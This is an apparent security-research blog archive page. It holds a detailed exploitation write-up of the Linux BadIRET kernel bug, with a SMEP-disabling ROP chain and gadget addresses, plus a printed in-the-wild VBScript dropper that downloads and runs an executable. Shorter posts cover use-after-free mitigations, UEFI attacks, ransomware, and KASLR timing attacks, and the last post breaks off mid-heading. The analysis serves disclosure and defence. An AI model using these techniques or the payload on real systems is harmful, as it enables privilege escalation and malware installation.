Skip to content
February 2, 2015 / Rafal Wojtczuk

Exploiting “BadIRET” vulnerability (CVE-2014-9322, Linux kernel privilege escalation)


is described as follows:

arch/x86/kernel/entry_64.S in the Linux kernel before 3.17.5 does not
properly handle faults associated with the Stack Segment (SS) segment
register, which allows local users to gain privileges by triggering an IRET
instruction that leads to access to a GS Base address from the wrong space. 

It was fixed on 23rd November 2014 with this commit.
I have seen neither a public exploit nor a detailed discussion about the issue. In this post I will try to explain the nature of the vulnerability and the exploitation steps as clearly as possible; unfortunately I cannot quote the full 3rd volume of Intel Software Developer’s Manuals, so if some terminology is unknown to the reader then details can be found there.
All experiments were conducted on Fedora 20 system, running 64bit 3.11.10-301 kernel; all the discussion is 64bit-specific.

Short results summary:

  1. With the tested kernel, the vulnerability can be reliably exploited to achieve kernelmode
    arbitrary code execution.

  2. SMEP does not prevent arbitrary code execution; SMAP does prevent arbitrary code execution.

Digression: kernel, usermode, iret

The vulnerability

In a few cases, when Linux kernel returns to usermode via iret, this instruction throws an exception. The exception handler returns execution to bad_iret function, that does

     /* So pretend we completed the iret and took the #GPF in user mode.*/
     pushq $0
     jmp general_protection

As the comment explains, the subsequent code flow should be identical to the case when
general protection exception happens in user mode (just jump to the #GP handler). This works well in case of most of the exceptions that can be raised by iret, e.g. #GP.

The problematic case is #SS exception. If a kernel is vulnerable (so, before kernel version 3.17.5) and has “espfix” functionality (introduced around kernel version 3.16), then bad_iret executes with a read-only stack – “push” instruction generates a page fault that gets converted into double fault. I have not analysed this scenario; from now on, we focus on pre 3.16 kernel, with no “espfix”.

The vulnerability stems from the fact that the exception handler for the #SS exception does not fit the “pretend-it-was-#GP-in-userspace” schema well. In comparison with e.g. #GP handler, the #SS exception handler does one extra swapgs instruction. In case you are not familiar with swapgs semantics, read the below paragraph, otherwise skip it.

Digression: swapgs instruction

When memory is accessed with gs segment prefix, like this:

mov %gs:LOGICAL_ADDRESS, %eax

the following actually happens:

  1. BASE_ADDRESS value is retrieved from the hidden part of the segment register
  2. memory at linear address LOGICAL_ADDRESS+BASE_ADDRESS is dereferenced

The base address is initially derived from Global Descriptor Table (or LDT). However, there are situations where GS segment base is changed on the fly, without involving GDT.

Quoting SDM:
“SWAPGS exchanges the current GS base register value with the value contained
in MSR address C0000102H
(IA32_KERNEL_GS_BASE). The SWAPGS instruction is a privileged instruction
intended for use by system software. (…) The kernel can then use the GS prefix on
normal memory references to access [per-cpu]kernel data structures.”
For each CPU, Linux kernel allocates at boot time a fixed-size structure holding crucial data. Then, for each CPU, Linux loads IA32_KERNEL_GS_BASE with this structure address. Therefore, the usual pattern of e.g. syscall handler is:

  1. swapgs (now the gs base points to kernel memory)
  2. access per-cpu kernel data structures via memory instructions with gs prefix
  3. swapgs (it undos the result of the previous swapgs, gs base points to usermode memory)
  4. return to usermode

Naturally, kernel code must ensure that whenever it wants to access percpu data with gs prefix, the number of swapgs instructions executed by the kernel since entry from usermode is noneven (so that gs base points to kernel memory).

Triggering the vulnerability

By now it should be obvious that the vulnerability is grave – because of one extra swapgs in the vulnerable code path, kernel will try to access important data structures with a wrong gs base, controllable by the user.
When is #SS exception thrown by the iret instruction? Interestingly, the Intel SDM is incomplete in this aspect; in the description of iret instruction, it says:

 64-Bit Mode Exceptions:
 If an attempt to pop a value off the stack violates the SS limit.
 If an attempt to pop a value off the stack causes a non-canonical address
 to be referenced.

None of these conditions can be forced to happen in kernel mode. However, the pseudocode for iret (in the same SDM) shows another case: when the segment defined by the return frame is not present:

IF stack segment is not present
THEN #SS(SS selector); FI;

So, in usermode, we need to set ss register to something not present. It is not straighforward: we cannot just use

mov $nonpresent_segment_selector, %eax
mov %ax, %ss

as the latter instruction will generate #GP. Setting the ss via debugger/ptrace is disallowed; similarly, the sys_sigreturn syscall does not set this register on 64bits system (it might work on 32bit, though). The solution is:

  1. thread A: create a custom segment X in LDT via sys_modify_ldt syscall
  2. thread B: ss:=X_selector
  3. thread A: invalidate X via sys_modify_ldt
  4. thread B: wait for hardware interrupt

The reason why one needs two threads (both in the same process) is that the return from the syscall (including sys_modify_ldt) is done via sysret instruction that hardcodes the ss value. If we invalidated X in the same thread that did “ss:=X instruction”, ss would be undone.
Running the above code results in kernel panic. In order to do something more meaningful, we will need to control usermode gs base; it can be set via arch_prctl(ARCH_SET_GS) syscall.

Achieving write primitive

If we run the above code, then #SS handler runs fine (meaning: it will not touch memory at gs base), returns into bad_iret, that in turn jumps to #GP exception handler. This runs fine for a while, and then calls the following function:

289 dotraplinkage void
290 do_general_protection(struct pt_regs *regs, long error_code)
291 {
292         struct task_struct *tsk;
306         tsk = current;
307         if (!user_mode(regs)) {
                ... it is not reached
317         }
319         tsk->thread.error_code = error_code;
320         tsk->thread.trap_nr = X86_TRAP_GP;
322         if (show_unhandled_signals && unhandled_signal(tsk, SIGSEGV) &&
323                         printk_ratelimit()) {
324                 pr_info("%s[%d] general protection ip:%lx sp:%lx
325                         tsk->comm, task_pid_nr(tsk),
326                         regs->ip, regs->sp, error_code);
327                 print_vma_addr(" in ", regs->ip);
328                 pr_cont("\n");
329         }
331         force_sig_info(SIGSEGV, SEND_SIG_PRIV, tsk);
332 exit:
333         exception_exit(prev_state);
334 }

It is far from obvious from the C code, but the assignment to tsk from current macro uses memory read with gs prefix. Line 306 is actually:

0xffffffff8164b79d :	mov    %gs:0xc780,%rbx

This gets interesting. We control the “current” pointer, that points to the giant data structure describing the whole Linux process. Particularly, the lines

319         tsk->thread.error_code = error_code;
320         tsk->thread.trap_nr = X86_TRAP_GP;

are writes to addresses (at some fixed offset from the beginning of the task struct) that we control. Note that the values being written are not controllable (they are 0 and 0xd constants, respectively), but this should not be a problem. Game over ?

Not quite. Say, we want to overwrite some important kernel data structure at X. If we do the following steps:

  1. prepare usermode memory at FAKE_PERCPU, and set gs base to it
  2. Make the location FAKE_PERCPU+0xc780 hold the pointer FAKE_CURRENT_WITH_OFFSET, such that FAKE_CURRENT_WITH_OFFSET= X – offsetof(struct task_struct, thread.error_code)
  3. trigger the vulnerability

Then indeed do_general_protection will write to X. But soon afterwards it will try to access other fields in the current task_struct again; e.g. unhandled_signal() function dereferences a pointer from task_struct. We have no control what lies beyond X, and the result will be a page fault in kernel.
How can we cope with this? Options:

  1. Do nothing. Linux kernel, unlike e.g. Windows, is quite permissive when it gets an unexpected page fault in kernel mode – if possible, it kills the current process, and tries to continue (while Windows bluescreens immediately).
    This does not work – the result is massive kernel data corruption and whole system freeze. My suspicion is that after the current process is killed, the swapgs imbalance persists, resulting in many unexpected page faults in the context of the other processes.

  2. Use the “tsk->thread.error_code = error_code” write to overwrite IDT entry for the page fault handler. Then the page fault (triggered by, say, unhandled_signal()) will result in running our code. This technique proved to be successful on a couple of occasions before.
    This does not work, either, for two reasons:

    • Linux makes IDT read-only (bravo!)
    • even if IDT was writeable, we do not control the overwrite value – it is 0 or 0xd. If we overwrite the top DWORDS of IDT entry for #PF, the resulting address will be in usermode, and SMEP will prevent handler execution (more on SMEP later). We could nullify the lowest one or two bytes of the legal handler address, but the chances of these two addresses being an useful stack pivot sequence are negligible.
  3. We can try a race. Say, “tsk->thread.error_code = error_code” write facilitates code
    execution, e.g. allows to control code pointer P that is called via SOME_SYSCALL. Then we can trigger our vulnerability on CPU 0, and at the same time CPU 1 can run SOME_SYSCALL in a loop. The idea is that we will get code execution via CPU 1 before damage is done on CPU 0, and e.g. hook the page fault handler, so that CPU 0 can do no more harm.
    I tried this approach a couple of times, with no luck; perhaps with different vulnerability the timings would be different and it would work better.

  4. Throw a towel on “tsk->thread.error_code = error_code” write.

With some disgust, we will follow the last option. We will point “current” to usermode location, setting the pointers in it so that the read dereferences on them hit our (controlled) memory. Naturally, we inspect the subsequent code to find more pointer write dereferences.

Achieving write primitive continued, aka life after do_general_protection

Our next chance is the function called by do_general_protection():

force_sig_info(int sig, struct siginfo *info, struct task_struct *t)
        unsigned long int flags;
        int ret, blocked, ignored;
        struct k_sigaction *action;

        spin_lock_irqsave(&t->sighand->siglock, flags);
        action = &t->sighand->action[sig-1];
        ignored = action->sa.sa_handler == SIG_IGN;
        blocked = sigismember(&t->blocked, sig);   
        if (blocked || ignored) {
                action->sa.sa_handler = SIG_DFL;
                if (blocked) {
                        sigdelset(&t->blocked, sig);
        if (action->sa.sa_handler == SIG_DFL)
                t->signal->flags &= ~SIGNAL_UNKILLABLE;
        ret = specific_send_sig_info(sig, info, t);
        spin_unlock_irqrestore(&t->sighand->siglock, flags);

        return ret;

The field “sighand” in task_struct is a pointer, that we can set to an arbitrary value. It means that the

action = &t->sighand->action[sig-1];
action->sa.sa_handler = SIG_DFL;

lines are another chance for write primitive to an arbitrary location. Again, we do not control the write value – it is the constant SIG_DFL, equal to 0.
This finally works, hurray ! with a little twist. Assume we want to overwrite location X in the kernel. We prepare our fake task_struct (particularly sighand field in it) so that X = address of t->sighand->action[sig-1].sa.sa_handler. But a few lines above, there is a line

spin_lock_irqsave(&t->sighand->siglock, flags);

As t->sighand->siglock is at constant offset from t->sighand->action[sig-1].sa.sa_handler, it means kernel will call spin_lock_irqsave on some address located after X, say at X+SPINLOCK, whose content we do not control. What happens then?
There are two possibilities:

  1. memory at X+SPINLOCK looks like an unlocked spinlock. spin_lock_irqsave will complete immediately. Final spin_unlock_irqrestore will undo the writes done by spin_lock_irqsave. Good.
  2. memory at X+SPINLOCK looks like a locked spinlock. spin_lock_irqsave will loop waiting for the spinlock – infinitely, if we do not react.
    This is worrying. In order to bypass this, we will need another assumption – we will need to know we are in this situation, meaning we will need to know the contents of memory at X+SPINLOCK. This is acceptable – we will see later that we will set X to be in kernel .data section. We will do the following:

    • initially, prepare FAKE_CURRENT so that t->sighand->siglock points to a locked spinlock in usermode, at SPINLOCK_USERMODE
    • force_sig_info() will hang in spin_lock_irqsave
    • at this moment, another usermode thread running on another CPU will change t->sighand, so that t->sighand->action[sig-1].sa.sa_handler is our overwrite target, and then unlock SPINLOCK_USERMODE
    • spin_lock_irqsave will return.
    • force_sig_info() will reload t->sighand, and perform the desired write.

A careful reader is encouraged to enquire why cannot use the latter approach in the case X+SPINLOCK is initially unlocked.
This is not all yet – we will need to prepare a few more fields in FAKE_CURRENT so that as little code as possible is executed. I will spare you the details – this blog is way too long already. The bottom line is that it works. What happens next? force_sig_info() returns, and do_general_protection() returns. The subsequent iret will throw #SS again (because still the usermode ss value on the stack refers to a nonpresent segment). But this time, the extra swapgs instruction in #SS handler will return the balance to the Force, cancelling the effect of the previous incorrect swapgs. do_general_protection() will be invoked and operate on real task_struct, not FAKE_CURRENT. Finally, the current task will be sent SIGSEGV, and another process will be scheduled for execution. The system remains stable.


Digression: SMEP

SMEP is a feature of Intel processors, starting from 3rd generation of Core processor. If the SMEP bit is set in CR4, CPU will refuse to execute code with kernel privileges if the code resides in usermode pages. Linux enables SMEP by default if available.

Achieving code execution

The previous paragraphs showed a way to overwrite 8 consecutive bytes in kernel memory with 0. How to turn this into code execution, assuming SMEP is enabled?
Overwriting a kernel code pointer would not work. We can either nullify its top bytes – but then the resulting address would be in usermode, and SMEP will prevent dereference of this pointer. Alternatively, we can nullify a few low bytes, but then the chances that the resulting pointer would point to an useful stack pivot sequence are low.
What we need is a kernel pointer P to structure X, that contains code pointers. We can overwrite top bytes of P so that the resulting address is in usermode, and P->code_pointer_in_x() call will jump to a location that we can choose.
I am not sure what is the best object to attack. For my experiments, I choose the kernel proc_root variable. It is a structure of type

struct proc_dir_entry {
        const struct inode_operations *proc_iops;
        const struct file_operations *proc_fops;
        struct proc_dir_entry *next, *parent, *subdir;
        u8 namelen;
        char name[];

This structure represents an entry in the proc filesystem (and proc_root represents the root of the /proc filesystem). When a filename path starting with /proc is looked up, the “subdir” pointers (starting with proc_root.subdir) are followed, until the matching name is found. Afterwards, pointers from proc_iops are called:

struct inode_operations {
        struct dentry * (*lookup) (struct inode *,struct dentry *, unsigned int);
        void * (*follow_link) (struct dentry *, struct nameidata *);
        ...many more...
        int (*update_time)(struct inode *, struct timespec *, int);
} ____cacheline_aligned;

proc_root resides in the kernel data section. It means that the exploit needs to know its address. This information is available from /proc/kallsyms; however, many hardened kernels do not allow unprivileged users to read from this pseudofile. Still, if the kernel is a known build (say, shipped with a distribution), this address can be obtained offline; along with tens of offsets required to build FAKE_CURRENT.
So, we will ovewrite proc_root.subdir so that it becomes a pointer to a controlled struct
proc_dir_entry residing in usermode. A slight complication is that we cannot overwrite the whole pointer. Remember, our write primitive is “overwrite with 8 zeroes”. If we made proc_root.subdir be 0, we would not be able to map it, because Linux does not allow usermode to map address 0 (more precisely, any address below /proc/sys/vm/mmap_min_addr, but the latter is 4k by default). It means we need to:

  1. map 16MB of memory at address 4096
  2. fill it with a pattern resembling proc_dir_entry, with the inode_operations field pointing to usermode address FAKE_IOPS, and name field being “A” string.
  3. configure the exploit to overwrite the top 5 bytes of proc_root.subdir

Then, unless the bottom 3 bytes of proc_root.subdir are 0, we can be sure that after triggering the overwrite in force_sig_info() proc_root.subdir will point to controlled usermode memory. When our process will call open(“/proc/A”, …), pointers from FAKE_IOPS will be called. What should they point to?
If you think the answer is “to our shellcode”, go back and read again.

We will need to point FAKE_IOPS pointers to a stack pivot sequence. This again assumes the knowledge of the precise version of the kernel running. The usual “xchg %esp, %eax; ret” code sequence (it is two bytes only, 94 c3, found at 0xffffffff8119f1ed in case of the tested kernel), works very well for 64bit kernel ROP. Even if there is no control over %rax, this xchg instruction operates on 32bit registers, thus clearing the high 32bits of %rsp, and landing %rsp in usermode memory. At the worst case, we may need to allocate low 4GB of virtual memory and fill it with rop chain.
In the case of the tested kernel, two different ways to dereference pointers in FAKE_IOPS were observed:

  1. %rax:=FAKE_IOPS; call *SOME_OFFSET(%rax)
  2. %rax:=FAKE_IOPS; %rax:=SOME_OFFSET(%rax); call *%rax

In the first case, after %rsp is exchanged with %rax, it will be equal to FAKE_IOPS. We need the rop chain to reside at the beginning of FAKE_IOPS, so it needs to start with something like “add $A_LOT, %rsp; ret”, and continue after the end of FAKE_IOPS pointers.
In the second case, the %rsp will be assigned the low 32bits of the call target, so 0x8119f1ed. We need to prepare the rop chain at this address as well.
To sum up, as the %rax value has one of two known values at the moment of the entry to the stack pivot sequence, we do not need to fill the whole 4G with rop chain, just the above two addresses.
The ROP chain itself is straightforward, shown for the second case:

unsigned long *stack=0x8119f1ed;
*stack++=0xffffffff81307bcdULL;  // pop rdi, ret
*stack++=0x407e0;                //cr4 with smep bit cleared
*stack++=0xffffffff8104c394ULL;  // mov rdi, cr4; pop %rbp; ret
*stack++=0xaabbccdd;             // placeholder for rbp


Digression: SMAP

SMAP is a feature of Intel processors, starting from 5th generation of Core processor. If the SMAP bit is set in CR4, CPU will refuse to access memory with kernel privileges if this memory resides in usermode pages. Linux enables SMAP by default if available. A test kernel module (run on an a system with Core-M 5Y10a CPU) that tries to access usermode crashes with:

[  314.099024] running with cr4=0x3407e0
[  389.885318] BUG: unable to handle kernel paging request at 00007f9d87670000
[  389.885455] IP: [ffffffffa0832029] test_write_proc+0x29/0x50 [smaptest]
[  389.885577] PGD 427cf067 PUD 42b22067 PMD 41ef3067 PTE 80000000408f9867
[  389.887253] Code: 48 8b 33 48 c7 c7 3f 30 83 a0 31 c0 e8 21 c1 f0 e0 44 89 e0 48 8b 

As we can see, although the usermode page is present, access to it throws a page fault.
Windows systems do not seem to support SMAP; Windows 10 Technical Preview build 9926 runs with cr4=0x1506f8 (SMEP set, SMAP unset); in comparison with Linux (that was tested on the same hardware) you can see that bit 21 in cr4 is not set. This is not surprising; in case of Linux, access to usermode is performed explicitely, via copy_from_user, copy_to_user and similar functions, so it is doable to turn off SMAP temporarily for the duration of these functions. On Windows, kernel code accesses usermode directly, just wrapping the access in the exception handler, so it is more difficult to adjust all the drivers in all required places to work properly with SMAP.

SMAP to the rescue!

The above exploitation method relied on preparing certain data structures in usermode and forcing the kernel to interpret them as trusted kernel data. This approach will not work with SMAP enabled – CPU will refuse to read malicious data from usermode.
What we could do is to craft all the required data structures, and then copy them to the kernel. For instance if one does

write(pipe_filedescriptor, evil_data, ...

then evil_data will be copied to a kernel pipe buffer. We would need to guess its address; some sort of heap spraying, combined with the fact that there is no spoon^W effective kernel ASLR, could work, although it is likely to be less reliable than exploitation without SMAP.
However, there is one more hurdle – remember, we need to set usermode gs base to point to our exploit data structures. In the scenario above (without SMAP), we used arch_prctl(ARCH_SET_GS) syscall, that is implemented in the following way in the kernel:

long do_arch_prctl(struct task_struct *task, int code, unsigned long addr)
         int ret = 0; 
         int doit = task == current;
         int cpu;
         switch (code) { 
         case ARCH_SET_GS:
                 if (addr >= TASK_SIZE_OF(task))
                         return -EPERM; 
                 ... honour the request otherwise

Houston, we have a problem – we cannot use this API to set gs base above the end of usermode memory !
Recent CPUs feature wrgsbase instruction, that sets the gs base directly. This is a nonprivileged instruction, but needs to be enabled by the kernel by setting the FSGSBASE bit (no 16) in CR4. Linux does not set this bit, and therefore usermode cannot use this instruction.

On 64bits, nonsystem entries in GDT and LDT are still 8 bytes long, and the base field is at most 4G-1 – so, no chance to set up a segment with base address in kernel space.
So, unless I missed another way to set usermode gs base in the kernel range, SMAP protects 64bit Linux against achieving arbitrary code execution via exploiting CVE-2014-9322.

January 17, 2015 / Jared DeMott

Use-after-Free: New Protections, and how to Defeat them

The Problem

Memory corruption has plagued computers for decades, and these bugs can often be transformed into working cyber-attacks. Memory corruption is a situation where an attacker (malicious user of an application or network protocol) is able to send some data that is improperly processed by the native computer code. That can lead to important control structure changes that allow the attacker unexpected influence over the path a program will travel.

High-level protections, such as anti-virus (AV), have done little to stop the tide. That is because AV is poor at reacting to threats if they do not exist in their list of known attacks. Recent low-level operating system (OS) protections have helped. Non-executable memory and code module randomization help prevent attackers from leveraging memory corruption bugs, by stopping injected code from successfully executing.

Yet a new memory corruption exploit variant called return-oriented programming (ROP) has survived these defenses. ROP operates by leveraging existing code in memory to undo non-executable memory protections. New medium-level defenses, such as Microsoft’s anti-ROP add-on called EMET, have helped some. But a particularly troublesome bug known as Use-after-Free (UaF) has been applied in conjunction with other techniques to bypass EMET (See Prior Blog HERE). UaFs have been the basis of many current cyber attacks including Operation SnowMan (CVE-2014-0322) and Operation Clandestine Fox (CVE-2014-1776). Thus, it is clear that further low-level mitigations are required.

The Solution

To address the problem of UaF attacks, browser vendors have implemented new protections within the browser process. A UaF happens when (1) a low-level data structure (called an object in C++) is released prematurely. (2) An attacker knows about this release and quickly fills that space with data they control. (3) A dangling reference to the original object, which another part of the program assumes is still valid, is used. But of course, an attacker unwittingly changed the objects data. The intruder can now leverage the influence afforded by the corrupted memory state to hijack the compromised program.

Microsoft choose to tackle this serious UaF problem with two new protections. These protections work together to stop attackers from being able to allocation new data in the spot where a dangling reference points. They call the new protections Heap Isolation and Delayed Free. The premise of these protections is simple. Heap Isolation creates a new heap. A heap is a place that a program uses to create/free internal data as needed throughout execution. This new isolated heap houses many internal Internet Explorer objects. While objects likely to be under the influence of attacks (like strings created via Java Script) will still be allocated on the typical default heap. Thus, if a UaF condition appears, the attacker should not be able to replace the memory of the dangling pointer with malicious data. We could liken this situation to forcing naughty school kids to use a separate playground from the trusted kids. But who is naughty and who is good? So also an obvious weakness with this approach is that with the many different objects used in a complex program like a browser, it is difficult for developers to perfectly separate the two groups of objects.

So Microsoft also created a second cleaver protection. Delayed free operates by not releasing an objects memory right away. In our analogy, if we assume the goal of the naughty kid is to steal the place in line from a good kid that unexpected stepped out of line, we can think of this protection as the playground teacher watching that place in line for a while, before the slot is finally opened. Even though the program has asked the allocator to free a chunk of memory, the object is not freed, but is instead put on a list to be freed later, when the playground looks safer. That way even if an attacker knows of an object type on both heaps that could be used to replace the memory backing a dangling reference, they cannot since the memory has not actually been freed yet. The memory will not be truly freed until the following conditions are meet: there are no references to the object on the stack and there are at least 100,000 bytes waiting to be freed, or the per-thread call stack unwinds fully to its original starting point.


Though the new protections are definitely helpful, and I even recommend applying them to other applications, no native mitigation is enough. If we look back at the history of memory corruption, we see that every time vendors put forth a new OS security measure, it worked in slowing attackers for a season, but before long each mitigation was bypassed by some clever new attack.

In my research, I show that one such bypass against these new protections involves using what I call a “long lived” dangling pointer. In my naughty child analogy, we can think of this as the sneaky and patient child that can go to either playground, and will wait for just the right moment before slipping ahead in line. In more technical terms, if an attacker can locate a UaF bug that involves code that maintains a heap reference to a dangling pointer, the conditions to actually free the object under the deferred free protection can be met (no stack references or call chain eventually unwinds). And finding useful objects in either playground to replace the original turns out not to be that difficult either. I wrote a python script to search the core Internet Explorer code module (called MSHTML.dll). The script finds all the different objects, their sizes, and notes rather it is allocated to the default or isolated heap. This information can be used to help locate useful objects to attack either heap.  And with a memory garbage collection process known as coalescing the replacement object does not even have to be the same size as the original object. This is useful for changing critical data (like the vtable pointer) at the proper offset in what was the original object. The python code is HERE. For complete details on this research, please see the slides from my January 17th ShmooCon talk HERE.

January 6, 2015 / Rafal Wojtczuk

CCC31 talk about UEFI security

Recently I presented at the 31st Chaos Communication Congress (together with Corey Kallenberg) and presented a talk titled “Attacks on UEFI security”. We described (and demoed) vulnerabilities allowing us to achieve write access to the flash chip (that stores UEFI code) and to SMM memory (that holds the code for the all-powerful System Management Mode). The CERT vulnerability notes are here, here and here ; you are also encouraged to read the presentation, the whitepaper and the second whitepaper.
TL;DR-style, these vulnerabilities are useful for an attacker who already has administrative privileges in the operating system, and wants to install a UEFI-based or SMM-based rootkit. So no, the sky is not falling, and this type of attack is not seen often in the wild. Yet some well knows cases are known, and as the topic gains quite some attention recently, there might be more in the future.

December 4, 2014 / Mantej Singh Rajpal

CVE-2014-6332: Life is all Rainbows and Unicorns

Though just patched earlier this month, the CVE-2014-6332 vulnerability shares it’s age with Yahoo, Neopets, and the hit TV show, Friends. This Windows vulnerability, also known as the “Unicorn” bug, has been exploited in the wild with help of a Visual Basic Script. It impacts almost every version of Microsoft Windows from Windows 95 onwards, and can be exploited in Internet Explorer versions 3 to 11, inclusive. This complex vulnerability gets its name from being extremely rare, somewhat like a unicorn. After all, it’s not every day you come across a unicorn galloping through your front yard.

A lot has already been said about this vulnerability. The bug is caused due to the IE VBScript engine not handling re-sizing an array properly. By abusing this, one can achieve remote code execution, bypassing protections such as DEP and ASLR. To explain the vulnerability in a nutshell – there exists a control flow such that if you request to re-size an array and an error occurs (e.g. OutOfMemoryError), the new size will be maintained (as opposed to being reset). After triggering the vulnerability, you will be able to access the out-of-bound elements of the array. The exploit then uses this vulnerability to perform type confusion. Original IBM Security Intelligence article describes the bug in great detail and a Trendmicro blog walks through the PoC.

Once type confusion is achieved, one could adopt Yang Yu’s approach to leak memory addresses using BSTR. An attacker would just need to change the array’s element type to BSTR and then corrupt its header. This will essentially allow any memory address to be leaked, thus, easily allowing an attacker to determine the location of COleScript – an object holding safety flags for the VB interpreter. Normally, some VB functionality, such as file system interaction and program launching, is restricted in the browser. However, resetting the respective flag allows an attacker to operate within IE as if it was a standalone VB shell.

In fact, the PoC is so straightforward that using it is trivial – one just needs to swap in their VB payload and it’s ready to ship for exploit kits and drive-by campaigns. Last week, we got hold of a Fiddler capture of a malicious web page exploiting this vulnerability.

The VB payload was obfuscated and hidden in a JavaScript snippet on the same page:


The de-obfuscated payload looks like this:

  set shell=createobject("Shell.Application")
  shell.ShellExecute "cmd.exe", " /c echo Set Post = CreateObject(""Msxml2.XMLHTTP"")
  >> c:\\nb.vbs & echo Set Shell = CreateObject(""Wscript.Shell"")
  >> c:\\nb.vbs & echo Post.Open ""GET"", "&nbnburl&" ,0
  >> c:\\nb.vbs & echo Post.Send()
  >> c:\\nb.vbs & echo Set aGet = CreateObject(""ADODB.Stream"")
  >> c:\\nb.vbs & echoaGet.Mode = 3
  >> c:\\nb.vbs & echo aGet.Type = 1
  >> c:\\nb.vbs & echo aGet.Open()
  >> c:\\nb.vbs & echo aGet.Write(Post.responseBody)
  >> c:\\nb.vbs & echo aGet.SaveToFile ""c:\\zl.exe"",2
  >> c:\\nb.vbs & echo wscript.sleep 1000
  >> c:\\nb.vbs & echo Shell.Run (""c:\\zl.exe"")
  >> c:\\nb.vbs & echo Set fsox = CreateObject(""Scripting.Filesystemobject"")
  >> c:\\nb.vbs & echo fsox.DeleteFile(WScript.ScriptFullName)
  >> c:\\nb.vbs & c:\\nb.vbs"

After the payload launches a shell, it connects to nbnburl (a link to a malicious exe). The server response is saved in the C:\ drive as zl.exe, which is then executed.

It should be noted that during our testing phase, the exploit didn’t work every single time. We conducted a series of experiments where we ran our exploit 25 times, and recorded how many runs resulted in a shell. Our observations indicate success rates ranging from 8/25 to 25/25. Of course, a better experiment could be designed, offering more statistically accurate results. In our case, we were testing to see if the exploit was 100% stable. Turns out, it isn’t. The one exception is IE 11 with enhanced protected mode, which thwarted the Unicorn exploit 25/25 times! EPM is disabled by default due to several compatibility issues, so users must manually enable it under Settings->Internet Options->Advanced, and check “Enable Enhanced Protected Mode” under Security.

For Bromium customers, this attack isn’t any different from other drive-by-downloads – the attack will be isolated and the following LAVA graph will be recorded:


This bug really is a special one — it’s reasonably stable, it is able to bypass the security mechanisms implemented in the latest Windows system, and it doesn’t require any 3rd party plugins (such as Java Runtime). Therefore, the impact factor is going to be enormous since it’s unlikely that all users will instantly update their systems.

The question now is, wouldn’t it be safer to simply disable all backwards compatibility features and get rid of the legacy software? The easy answer is yes, but if we scrutinize this matter a bit we can see that it’s not that straightforward. Backwards compatibility is there for a reason – if a software update changes the workflow of an application, users must be given an option to return to their old setup. This minimizes failures that could be caused by the patches.

Unfortunately, there’s no easy solution, and software update management is a huge problem today. Isolation is one viable way to address this issue.

November 19, 2014 / Vadim Kotov

Would you like some encryption with your turkey?

Crypto-ransomware continues to grow and mutate. Yet another family popped up the other day called CoinVault. Like Cryptographic Locker this one is a .NET application although not as advanced as Cryptolocker or Cryptowall, but it apparently does its job reasonably well.
We were wondering recently are there any trends in crypto-ransomware, how does the threat evolves over time and is there any connection between the gangs? So we wrote a report that summarizes our analysis of six ransom Trojans:

  • Dirty Decrypt
  • CryptoLocker
  • CryptoWall / CryptoDefense
  • Critroni/CTB Locker
  • TorrentLocker
  • Cryptographic Locker

We looked at nearly 30 samples and here are the main findings of the research:

  • The latest families target a huge number of enterprise file formats from documents and images to CAD files and financial data instead of just common consumer file types.
  • Crypto-ransomware uses every possible attack vector to get into victim machines.
  • Samples analyzed use fairly complex obfuscation and covert launch techniques that allow them to evade detection on early stages of infection.
  • Communication with command and control servers is encrypted and extremely hard to spot in the network traffic.
  • Cryptography used in the samples analyzed is for the most part implemented correctly and encrypted files are impossible to recover without a key.
  • All recent ransomware accepts payments in Bitcoins only. Apparently there’s a good way of laundering BTC or maybe even a service on the black market.
  • Crypto-ransomware matures and evolves from version to version, additional features are added to ensure that files are impossible to recover (e.g. deleting shadow copies) and flaws are getting fixed.

This threat won’t go away, as long as people pay the ransom, new ransomware families will appear. For the detailed analysis of the aforementioned families read the full report.

Bromium customers should not worry about this threat since we’re able to isolate crypto-ransomware and prevent it from accessing the file system. If a crypto-enabled piece of malware successfully executes inside the micro VM LAVA will produce an attack graph that looks like this:



LAVA provides full details of the ransomware activity, the vector used to attack the system and the location of the attackers C&C server. We will continue to track developments with these types of attacks and will provide additional information as it becomes available.

October 27, 2014 / Rafal Wojtczuk

TSX improves timing attacks against KASLR

Mega biblion mega kakon…

… and similarly a long blog is a nuisance, so I managed to squeeze the essence of it into a single sentence, the title. If it is not entirely clear, read on.


A typical privilege escalation exploit based on a kernel vulnerabilit yworks by corrupting the kernel memory in a way advantageous for an attacker. Two scenarios are possible:

  1. arbitrary code execution in kernel mode
  2. data-only; just alter kernel memory so that privileges are elevated (e.g. change the access token of the current process)

Usually, the first method is most straightforward, and most flexible. With SMEP enabled, attacker cannot just divert kernel execution into code stored in usermode pages; more work is needed, a generic method being ROP in kernel body.

Kernel ASLR

Usually, both above methods require some knowledge about kernel memory layout. Particularly, in order to build a ROP chain in kernel body, we need to know the base of the kernel or a driver. In windows 8.1 significant changes were introduced to not give to the attacker the memory layout for free. They affect only processes running with integrity level lower than medium, but it is the most interesting case, as OS-based sandboxes encapsulate untrusted code in such a process. The effectiveness of Windows 8.1 KALSR depends on the type of vulnerability primitive available to the attacker:

  1. If one can read and write arbitrary address with arbitrary contents multiple times, there is no problem, as one can learn the full memory layout.
  2. If one can overwrite arbitrary address with arbitrary content at least twice, then a generic method is to overwrite the IDT entry for interrupt Y with usermode address X (note IDT base can be obtained via unprivileged sidt instruction), and then change the type of page holding X so that it becomes a superuser page (possible because page table entries are at known location). Finally, trigger code execution with int Y instruction. I assume it is message of this post, although they do not discuss how to locate a kernel code pointer (meaning, beat KASLR) that subsequently should be overwritten. In some cases we do not need to know the address of the kernel code pointer, e.g. if it lives in an area that we can overflow or alter under use-after-free condition.
  3. If one can just control a kernel function pointer, then… We can divert execution neither to usermode (because of SMEP) nor to kernelmode (because of KASLR we do not know addresses of any ROP gadget). Any hints?

Recently I played with a vulnerability from the third category, and (at least for me) KASLR provided significant resistance. It can be argued that there is potential for kernel bugs that leak some pointers and thus allow to bypass KASLR, but something more generic would be better.

Timing attacks against KASLR

An excellent paper describes methods to bypass KASLR via timing attacks. One of the discussed methods is: in usermode, access kernel address X, and measure the time elapsed until the usermode exception handler is invoked. The point is that even though usermode access to X throws a page fault regardless whether X is in mapped kernel memory or not, the timings are different. When we recover the list of mapped pages, we can infer the kernel base (or some driver base) and consequently the addresses of useful code snippets in it – all we need to build a ROP chain.

Timing attacks need to take care of the inherent noise. Particularly, on Windows invoking the usermode exception handler requires a lot of CPU instructions, and the difference in timing can be difficult to observe. It would be much better if the probing did not result in the whole kernel page fault handler executing. Any hints?

TSX to the rescue

